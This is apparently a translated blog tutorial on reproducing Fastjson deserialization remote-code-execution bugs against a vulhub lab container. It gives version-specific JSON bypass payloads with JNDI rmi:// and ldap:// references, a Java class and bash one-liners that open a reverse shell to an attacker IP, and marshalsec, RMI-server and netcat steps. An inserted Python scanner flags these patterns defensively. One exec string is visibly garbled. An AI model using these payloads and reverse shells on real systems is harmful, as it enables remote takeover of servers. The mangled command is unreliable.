Recurrence of fastjson historical vulnerabilities
2022-07-28 00:43:00 【Zigzag rise】
Fastjson brief introduction
Fastjson is an open-source JSON parser from Alibaba. It parses JSON-format strings, serializes Java Beans to JSON strings, and deserializes JSON strings back into Java Beans.
Historical vulnerabilities
Fastjson <=1.2.24 deserialization remote command execution vulnerability
Fastjson <=1.2.41 deserialization remote command execution vulnerability
Fastjson <=1.2.42 deserialization remote command execution vulnerability
Fastjson <=1.2.43 deserialization remote command execution vulnerability
Fastjson <=1.2.45 deserialization remote command execution vulnerability
Fastjson <=1.2.47 deserialization remote command execution vulnerability
Fastjson <=1.2.62 deserialization remote command execution vulnerability
Fastjson <=1.2.66 deserialization remote command execution vulnerability
Fastjson < 1.2.41
After the first Fastjson deserialization vulnerability was disclosed, Alibaba set the autoTypeSupport property to false by default in version 1.2.25 and added the checkAutoType() function, which defends against Fastjson deserialization with a blacklist and a whitelist. As a result, every Fastjson deserialization vulnerability found afterwards is about bypassing the blacklist to achieve exploitation.
com.sun.rowset.JdbcRowSetImpl was blacklisted in version 1.2.25, but fastjson contains a check for whether the class name starts with "L" and ends with ";"; if it does, the inner class name is extracted and loaded.
The following exp can therefore be constructed:
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;", "dataSourceName":"rmi://ip:9999/rce_1_2_24_exploit", "autoCommit":true}
Fastjson < 1.2.42
Alibaba found this bypass and fixed it by stripping the leading L and trailing ; from a class name that starts with L and ends with ; before running the blacklist check. The case of doubled or repeated wrapping was not considered, so this method only strips one pair of L and ;. The exp is constructed as follows, with L and ; written twice:
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;", "dataSourceName":"rmi://x.x.x.x:9999/exp", "autoCommit":true}
Fastjson < 1.2.47
In version 1.2.47 and below, the cache parameter of loadClass defaults to true. A java.lang.Class entry is used first so that the loaded class is stored in the mapping cache; com.sun.rowset.JdbcRowSetImpl is then fetched directly from the cache, which bypasses the blacklist.
{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://ip:9999/exp", "autoCommit": true }}
Fastjson < 1.2.66
This is a blacklist-based bypass and only works when the autoTypeSupport property is true; since version 1.2.25 autoTypeSupport defaults to false.
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://ip:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://ip:1389/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://ip:1389/Calc"}
Fastjson identification
Fastjson is used to parse and package JSON-format data, so Fastjson may be present wherever JSON-format data appears.
Capture the request with burpsuite and check whether its Content-Type is application/json. Error messages can then be used to determine whether the parser is fastjson.
Fastjson error-based identification:
Capture the request with burpsuite => send it to Repeater => right-click the request header and select "Change request method" (this changes the HTTP method) => change the Content-Type to application/json => add a JSON-format body.
When the format is correct, the content is returned.
What if we construct a malformed JSON body?
The error message reveals information about the JSON parser.
You can also construct the following JSON to reveal the fastjson version.
[
{
"a":"a\x] {"@type":"java.lang.AutoCloseable"a

Fastjson vulnerability discovery
Principle: the java.net.InetAddress class tries to resolve the domain name example.com when it is instantiated, so a dnslog service can be used to tell whether the vulnerability exists.

If the DNS query for the domain name is seen, the fastjson vulnerability can be judged to exist.
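The following Python checker is an added example, not code from the original post: it applies the defender-side version of the checks discussed in the bypass sections above (stripping every L...; descriptor wrapper rather than one pair, treating a java.lang.Class entry with val as cache priming, flagging rmi:// and ldap:// references) and in the discovery section (the java.net.InetAddress DNS probe). The gadget class list is constructed only from the classes named on this page, and the IP addresses in the sample payloads are placeholders.

```python
import json

# Gadget classes named on this page (constructed denylist; fastjson's own list is much longer).
GADGET_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.shiro.jndi.JndiObjectFactory",
    "br.com.anteros.dbcp.AnterosDBCPConfig",
    "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
}
PROBE_CLASSES = {"java.net.InetAddress"}  # dnslog presence check from the discovery section
# Schemes a JNDI lookup follows to a remote server.
REMOTE_SCHEMES = ("rmi://", "ldap://")


def normalize_type(name):
    """Strip every L...; descriptor wrapper, not only one pair as 1.2.42 did."""
    while len(name) > 2 and name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


def _walk(node, findings):
    if isinstance(node, dict):
        type_name = node.get("@type")
        if isinstance(type_name, str):
            cls = normalize_type(type_name)
            if cls in GADGET_CLASSES:
                findings.append("gadget class " + cls)
            elif cls in PROBE_CLASSES:
                findings.append("DNS probe via " + cls)
            elif cls == "java.lang.Class" and isinstance(node.get("val"), str):
                # java.lang.Class with val pre-loads a class into the cache (1.2.47 trick).
                findings.append("cache priming of " + normalize_type(node["val"]))
        for key, value in node.items():
            if isinstance(value, str) and value.lower().startswith(REMOTE_SCHEMES):
                findings.append("remote JNDI reference in " + key + ": " + value)
            _walk(value, findings)
    elif isinstance(node, list):
        for item in node:
            _walk(item, findings)


def scan_payload(raw):
    try:
        data = json.loads(raw)
    except ValueError:
        # fastjson is more lenient than json.loads, so malformed input is still worth flagging.
        return ["not strict JSON; fastjson may still parse it"]
    findings = []
    _walk(data, findings)
    return findings
```

Run scan_payload over each request body before it reaches the application; an empty list means none of the patterns from this page matched.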
Fastjson 1.2.47 deserialization vulnerability (CNVD-2019-22238)
Vulnerability profile
While parsing JSON, fastjson supports using autoType to instantiate a specific class and calls its set/get methods to access properties. By searching the code for relevant methods, a number of malicious gadget chains can be constructed.
fastjson added a deserialization whitelist after version 1.2.24, but in versions before 1.2.48 an attacker can use a specially constructed JSON string to bypass the whitelist check and execute arbitrary commands.
Affected version
fastjson < 1.2.48
JNDI
JNDI (The Java Naming and Directory Interface) is a set of APIs for accessing naming and directory services from Java applications. A naming service associates names with objects so that objects can be accessed by name.
The following naming/directory services can be accessed:
RMI (Java Remote Method Invocation)
LDAP (Lightweight Directory Access Protocol)
CORBA (Common Object Request Broker Architecture)
DNS (Domain Name Service)
JNDI injection + RMI
RMI is Java Remote Method Invocation, the Java programming language's application programming interface for remote procedure calls. It allows a program running on a client to invoke objects on a remote server.
Vulnerability reproduction
- Build the target environment with docker
cd vulhub--master
ls
cd fastjson/
ls
cd 1.2.47-rce/
docker-compose up -d
docker ps

- Use the browser to access the target address (http://ip:port).

Method 1: JNDI injection + RMI
- Download and use the tool on the attacker machine.
https://toolaffix.oss-cn-beijing.aliyuncs.com/jndi_tool.jar
- Reverse shell
Base64-encode bash -i >& /dev/tcp/<attacker ip>/6666 0>&1, for example with the Decoder module in burpsuite.
1. bash -i >& /dev/tcp/<attacker ip>/6666 0>&1
2. bash -c {echo,<base64 of bash -i >& /dev/tcp/<attacker ip>/6666 0>&1>}|{base64,-d}|{bash,-i}
3. java -cp fastjson_tool.jar fastjson.HRMIServer 171.16.1.105 9999 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzEuMTYuMS4xMDUvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"
- Use the tool to start the RMI server
java -cp fastjson_tool.jar fastjson.HRMIServer 124.71.45.28 9999 "<command to execute>"

- Open a new window and listen on the port.
nc -lnvp 6666

- Construct the payload and attack, using JNDI injection to load the bytecode from the remote RMI server (fixed format)
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://<attacker ip>:9999/Object",
        "autoCommit":true
    }
}

Click Send, then go back to the listener and view the result.

Reverse shell established!
Method 2:
1. Exploit.java
//javac Exploit.java
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
    public Exploit(){
        try{
            // spawn the reverse shell when the class is instantiated
            Runtime.getRuntime().exec("/bin/bash -c [email protected]|bash 0 echo bash -i >& /dev/tcp/47.101.214.85/6666 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}
- Run javac Exploit.java; this generates an Exploit.class bytecode file in the current directory.
- Use marshalsec to start an RMI server listening on a port and specify the remote class Exploit.class to load.
Package the project into a jar with maven: mvn clean package -DskipTests
- Start an http service.
python3 -m http.server

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://171.16.1.105:8000/#Exploit" 9999

Start listening on the port.

- Construct the payload and attack.

Click Send, then go back to the listener and view the result.